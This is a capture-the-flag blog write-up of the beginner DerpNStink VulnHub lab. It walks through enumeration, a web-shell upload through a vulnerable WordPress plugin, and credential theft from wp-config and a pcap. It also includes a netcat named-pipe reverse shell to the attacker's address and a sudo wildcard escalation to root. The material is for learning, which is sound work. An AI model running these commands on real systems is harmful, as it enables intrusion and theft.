DerpNStink won't stink anymore
Resolving boot2root DerpNStink VM

Another day another boot2root VM. This time DerpNStink, it’s level is “beginner”. To make things short, let’s dive in.

Information

The VM includes 4 flags to find, flags are having format flag[int])([random string]). Goal is to get root access to the machine. There are no hints given.

Flag 1

Obtaining flag 1 is pretty easy. First we do a port scan on the VM:

[email protected]:~/pentesting/vulnhub/derpnstink# nmap -A -O -n -p- 192.168.159.132
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-05 14:57 CEST
Nmap scan report for 192.168.159.132
Host is up (0.0010s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca<img class='emoji' title='ab' alt='ab' src='https://github.global.ssl.fastly.net/images/icons/emoji/ab.png' height='20' width='20' align='absmiddle' >5d:2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:30:50:3E (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.04 ms 192.168.159.132

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds

We see that ports 21,22,80 are open. Testing FTP port:

[email protected]:~/pentesting/vulnhub/derpnstink# ftp 192.168.159.132
Connected to 192.168.159.132.
220 (vsFTPd 3.0.2)
Name (192.168.159.132:root): anonymous
530 Permission denied.
Login failed.
ftp>

Okay, so no access. Let’s focus on :80 then and open it with Firefox.

And curl it:

[email protected]:~/pentesting/vulnhub/derpnstink# curl 192.168.159.132
<html >

<head>

    <meta charset="UTF-8">

    <title>DeRPnStiNK</title>

    <link rel="stylesheet" href="css/style.css">
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
<script type="text/javascript" src="/is/js/release/kveik.1.4.24.js?1"></script>
<script type="text/info" src="/webnotes/info.txt"></script>
</head>

<body>
  <!-- particles.js container -->
<div id="particles-js"></div>

<!-- stats - count particles -->
<div class="count-particles">

</div>
<div class="divhead"
<h1 style="color:Purple; font-size:250%;">DeRPnStiNK</h1>
</div>
<div class="divpic">
<table>
	    <tr>
    	    <td style="padding:5px">
        	    <img src="derp.png">
      	    </td>
            <td style="padding:5px">
            	<img src="stinky.png">
             </td>
        </tr>
    </table>

</div>

<script src='js/particles.min.js'></script>
<script src="js/index.js"></script>

</body>






















































<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div class=tryharder>
<div>
<div>
<div>
<div>
<div>
<div>
<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>




</html>

Oh, we have our 1st flag here: flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

Flag 2

Processing further we noticed that a robots.txt file was mentioned by the port scan. The content is as below:

User-agent: *
Disallow: /php/
Disallow: /temporary/

Folder /php/ gives 403 Forbidden and temporary a 200 OK with this content:

try harder!

So, let’s search for known directories with gobuster:

[email protected]:~# gobuster -e -t 120 -u http://192.168.159.132/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.159.132/
[+] Threads      : 120
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes : 307,200,204,301,302
[+] Expanded     : true
=====================================================
http://192.168.159.132/weblog (Status: 301)
http://192.168.159.132/php (Status: 301)
http://192.168.159.132/css (Status: 301)
http://192.168.159.132/js (Status: 301)
http://192.168.159.132/javascript (Status: 301)
http://192.168.159.132/temporary (Status: 301)
=====================================================

And for /php/ we found:

http://192.168.159.132/php/info.php (Status: 200)
http://192.168.159.132/php/phpmyadmin (Status: 301)

info.php is just empty and phpmyadmin/ is what it says. In /temporary/ I cannot find anything of interest. Interesting is the folder /weblog, when I open it this is shown:

That means we are being redirect to derpnstink.local, so let’s change our hosts file: echo -e "192.168.159.132 derpnstink.local" | tee -a /etc/hosts

Hello website! And it’s

Proudly powered by WordPress

Let’s crawl deeper inside the rabbit hole. wpscan is a nice tool to get some information about Wordpress installs. It gathers information about the installed version, users and extensions like themes and plugins. Also it checks if there are known vulnerabilities for these.

[email protected]:~# wpscan --url http://derpnstink.local/weblog/ -e u,vp,vt
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.3
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://derpnstink.local/weblog/
[+] Started: Tue Jun  5 20:17:14 2018

[!] The WordPress 'http://derpnstink.local/weblog/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://derpnstink.local/weblog/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: LINK: <http://derpnstink.local/weblog/>; rel=shortlink
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.22
[+] XML-RPC Interface available under: http://derpnstink.local/weblog/xmlrpc.php

[+] WordPress version 4.6.9 (Released on 2017-11-29) identified from meta generator, links opml
[!] 5 vulnerabilities identified from the version number

[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/9006
    Reference: https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
    Reference: https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
    Reference: https://core.trac.wordpress.org/ticket/42720
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
[i] Fixed in: 4.6.10

[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
    Reference: https://wpvulndb.com/vulnerabilities/9021
    Reference: https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
    Reference: https://github.com/quitten/doser.py
    Reference: https://thehackernews.com/2018/02/wordpress-dos-exploit.html
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389

[!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
    Reference: https://wpvulndb.com/vulnerabilities/9053
    Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
[i] Fixed in: 4.6.11

[!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
    Reference: https://wpvulndb.com/vulnerabilities/9054
    Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
[i] Fixed in: 4.6.11

[!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
    Reference: https://wpvulndb.com/vulnerabilities/9055
    Reference: https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
[i] Fixed in: 4.6.11

[+] WordPress theme in use: twentysixteen - v1.3

[+] Name: twentysixteen - v1.3
 |  Last updated: 2018-05-17T00:00:00.000Z
 |  Location: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/
 |  Readme: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/readme.txt
[!] The version is out of date, the latest version is 1.5
 |  Style URL: http://derpnstink.local/weblog/wp-content/themes/twentysixteen/style.css
 |  Theme Name: Twenty Sixteen
 |  Theme URI: https://wordpress.org/themes/twentysixteen/
 |  Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthe...
 |  Author: the WordPress team
 |  Author URI: https://wordpress.org/

[+] Enumerating installed plugins (only ones with known vulnerabilities) ...

   Time: 00:00:01 <=================================================================> (1644 / 1644) 100.00% Time: 00:00:01

[+] We found 1 plugins:

[+] Name: slideshow-gallery - v1.4.6
 |  Last updated: 2017-07-17T09:36:00.000Z
 |  Location: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/
 |  Readme: http://derpnstink.local/weblog/wp-content/plugins/slideshow-gallery/readme.txt
[!] The version is out of date, the latest version is 1.6.7.1

[!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
    Reference: https://wpvulndb.com/vulnerabilities/7532
    Reference: http://seclists.org/bugtraq/2014/Sep/1
    Reference: http://packetstormsecurity.com/files/131526/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
    Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
    Reference: https://www.exploit-db.com/exploits/34681/
    Reference: https://www.exploit-db.com/exploits/34514/
[i] Fixed in: 1.4.7

[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8263
    Reference: http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
    Reference: http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
[i] Fixed in: 1.5.3.4

[!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8786
    Reference: https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_tribulant_slideshow_galleries_wordpress_plugin.html
    Reference: https://plugins.trac.wordpress.org/changeset/1609730/slideshow-gallery
[i] Fixed in: 1.6.5

[!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8795
    Reference: http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf
    Reference: https://packetstormsecurity.com/files/142079/DC-2017-01-014.pdf
[i] Fixed in: 1.6.6

[+] Enumerating installed themes (only ones with known vulnerabilities) ...

   Time: 00:00:00 <===================================================================> (286 / 286) 100.00% Time: 00:00:00

[+] No themes found

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+-------------+---------------------------------+
    | Id | Login       | Name                            |
    +----+-------------+---------------------------------+
    | 1  | unclestinky | 404 Not                         |
    | 2  | admin       | admin – DeRPnStiNK Professional |
    +----+-------------+---------------------------------+

[+] Finished: Tue Jun  5 20:17:22 2018
[+] Requests Done: 2334
[+] Memory used: 119.941 MB
[+] Elapsed time: 00:00:08

Let’s focus on the vulns which are interesting for us. file upload is one of the buzzwords for us, we are seeing that the plugin Slideshow Gallery is outdated and working exploits are existing. With that version the uploaded file type won’t be checked. There is a nice rule if you code:

never trust the user

This means you have to check all inputs you get from a user. Really, do it!
Here is a Python script to upload a file via a vulnerability. Hooray! To gain access to the server’s system I’ll upload a PHP shell which is able to get a working shell on the system. I use weevely3 to gain that goal. This a very tiny shell to where I will connect. We use it like that in our scenario:

[email protected]:~/tools/weevely3# ./weevely.py generate r00t agent.php
Generated 'agent.php' with password 'r00t' of 675 byte size.

But wait, we need login credentials to be able to use the exploit. The scan of wpscan shows that two users are existing, admin and unclestinky. With some luck I got admin:admin, very secure! Upload the shell:

[email protected]:~/pentesting/vulnhub/derpnstink# python wp_gallery_slideshow_146_suv.py -u admin -p admin -t http://derpnstink.local/weblog/ -f agent.php
[...]
[+] Username & password ACCEPTED!

[!] Shell Uploaded!
[+] Check url: http://derpnstink.local/weblog//wp-content/uploads/slideshow-gallery/agent.php (lowercase!!!!)

Use it:

[email protected]:~/tools/weevely3# ./weevely.py http://derpnstink.local/weblog//wp-content/uploads/slideshow-gallery/agent.php r00t

[+] weevely 3.6

[+] Target:	[email protected]:/var/www/html/weblog/wp-content/uploads/slideshow-gallery
[+] Session:	/root/.weevely/sessions/derpnstink.local/agent_0.session
[+] Shell:	System shell

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely>
[email protected]:/var/www/html/weblog/wp-content/uploads/slideshow-gallery $ cd ../../
[email protected]:/var/www/html/weblog/wp-content $ cd ../
[email protected]:/var/www/html/weblog $ ls
index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
[email protected]:/var/www/html/weblog $ cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'mysql');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         's%|W}Qf|a;(QY-E]Axb-JX~M5rvs8W~mOv Wj)+(%<!b.5Ed/)f^1|5aBS-s;k>/');
define('SECURE_AUTH_KEY',  '[6yT.2HJ#>[email protected]@dDzk)m+>qL|i-rpZ($)x}-%B7<j!&-X2R)b#k|%{n-mA-I&0');
define('LOGGED_IN_KEY',    'yOb;5LX`bCjk*l^|X]%ud7|X,*y4}1MNqr|c}Sxly(mt%S+g#[email protected]}~mBrG%D[vG');
define('NONCE_KEY',        ')?88dD5Yu(mKJDq)>E1~2%K Cm^HY&] (S7EtEI,X-?n3T)ui#Tfm[t_bz=I-ZK8');
define('AUTH_SALT',        '7,q<zw7`I!N6K>L=]fY:A.[+W`E^``|I+U|W4C(e_Ph `|KVfd{BbRbO?rFp,AN:');
define('SECURE_AUTH_SALT', '14EV-M=x?/lW3ODB7ro^;}&J4&ggBY#xohsa&7ZX/l[Xp,P;DY;AbPDA4oO#<vKd');
define('LOGGED_IN_SALT',   'X7u~-+BjC%vj!Ht<nzu~qs/m[~)C</G7:s,Q$M`zD>X91xC;btxvAe-^/5.(C(|j');
define('NONCE_SALT',       'wi*WOj8Q*+_Vvk23ImDiNDToe3}P>[email protected]+BoA/6%{bldVnPb]+l0/U]|;=c');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
[email protected]:/var/www/html/weblog $

We have a valid login for MySQL here, as root. Woot? So we dump all databases on our webshell: mysqldump --user=root --password=mysql --all-databases > dump.sql and then download the SQL file. At first I’m searching for a flag (we know the pattern of it):

[email protected]:~/pentesting/vulnhub/derpnstink# cat dump.sql | grep -o "flag[0-9]([0-9A-Za-z]*)"
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

Hooray, we found our 2nd flag!

Flag 3

It’s half time, we found 2 flags out of 4. At first, let’s dig deeper inside the SQL dump. Interesting might be the passwords for the users.

INSERT INTO 'wp_users' VALUES
(1,'unclestinky','$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41','unclestinky','[email protected]','','2017-11-12 03:25:32','1510544888:$P$BQbCmzW/ICRqb1hU96nIVUFOlNMKJM1',0,'unclestinky',''),
(2,'admin','$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/','admin','[email protected]','','2017-11-13 04:29:35','',0,'admin','');

We know that admin has the password admin, as of that I focus on the two password strings of unclestinky. When we use hash type 400 in hashcat and using rockyou.txt as wordlist (Kali Linux has it in /usr/share/wordlists/ as compressed file) we’ll get: $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41:wedgie57

Where to use it then? Let’s see which users we have in /etc/passwd:

root
daemon
bin
sys
sync
games
man
lp
mail
news
uucp
proxy
www-data
backup
list
irc
gnats
nobody
libuuid
syslog
messagebus
usbmux
dnsmasq
avahi-autoipd
kernoops
rtkit
saned
whoopsie
speech-dispatcher
avahi
lightdm
colord
hplip
pulse
mysql
sshd
stinky
ftp
mrderp

Hmm, stinky, unclestinky. I hardly guess that’s the same guy. When I try to login via SSH with stinky:wedgie57 I only get

[email protected]: Permission denied (publickey).

We don’t have one…
But! There is the command su, with that we are able to switch our identity on the system (terminal based access). When we enter that in our weevely3 shell it results in an error: su: must be run from a terminal. So we need a valid tty shell. To check if we are on tty just simply enter tty:

[email protected]:/var/www/html/weblog/wp-content/uploads/slideshow-gallery $ tty
not a tty

I did not manage to get a proper tty terminal inside weevely3, neither with python -c 'import pty; pty.spawn("/bin/sh")' nor with /bin/sh -i. If you want a list of some commands to spawn a tty shell look here.
I got some help from @eiphunt3r, he mentioned this article to gain a tty shell with socat. Problem: there is no socat on the target machine, also the static binary won’t work. nc is installed to get a reverse shell, but it’s the verson without the option -e. Bad, bad. Wait, help is on the way! I found this article regarding a workaround for the missing -e parameter. Using it: first spawn up a listener on your machine: nc -lvp 4444. Then throw that command to your weevely3 shell: /bin/sh 0</tmp/backpipe | nc 192.168.159.128 4444 1>/tmp/backpipe. Well,

not a tty

No problem! Throwing that in:

python -c 'import pty; pty.spawn("/bin/sh")'
$ tty
tty
/dev/pts/19

Finally! Now, let’s su:

$ su stinky
su stinky
Password: wedgie57

[email protected]:/var/www/html/weblog/wp-content/uploads/slideshow-gallery$ id
<html/weblog/wp-content/uploads/slideshow-gallery$ id                        
uid=1001(stinky) gid=1001(stinky) groups=1001(stinky)

We are user stinky now. Crawling his home folder we got some files:

Flag 4

Last flag to obtain. Firstly: with the obtained key.txt file we are able to login via SSH as stinky, it’s really the private key for the account. So we don’t need to jump around spawned shells anymore.

Regarding the chat log we see that mrderp deleted his account and stinky created it again with a new password. mrderp captured the network transmission, that’s file derpissues.pcap. Let’s open it in Wireshark.
We see a normal capture of the whole traffic which happened for the recorded time. What we might want to see is the event when the account for mrderp has been created or when he logged in. There we might see the used password. Good that the session was not encrypted with TLS. When a user logs in, Wordpress uses HTTP method POST, so simply filter for POST methods: http.request.method == POST. There we see /weblog/wp-login.php as target, the file where Wordpress handles the login request.

Bingo! The used password was derpderpderpderpderpderpderp, so why don’t try also su here?

[email protected]:~/ftp/files/network-logs$ su mrderp
Password:
[email protected]:/home/stinky/ftp/files/network-logs$ id
uid=1000(mrderp) gid=1000(mrderp) groups=1000(mrderp)

Ha! Basic enumeration is looking which sudo privileges someone has:

[email protected]:/home/stinky/ftp/files/network-logs$ sudo -l
[sudo] password for mrderp:
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*

That means that we are able to use all commands as privileged user when we start something in /home/mrderp/binaries/ which is starting with filename derpy.
I created a simple BASH script for that:

#!/bin/bash
/bin/sh -i

Running it with sudo:

[email protected]:~$ sudo /home/mrderp/binaries/derpy_root.sh
# id
uid=0(root) gid=0(root) groups=0(root)
# ls /root
Desktop  Documents  Downloads
# ls /root/Desktop
flag.txt
# cat /root/Desktop/flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo


#

We have our last flag!

Conclusion

This was a easy boot2root VM, as it says ‘beginner’ level. We saw that using outdated versions of plugins is a bad thing, just keep them up to date. Also using weak passwords is a bad thing. And enumeration is the key to success. Overall it was a funny VM which I enjoyed.

*****
Written by wirehack7 on 05 June 2018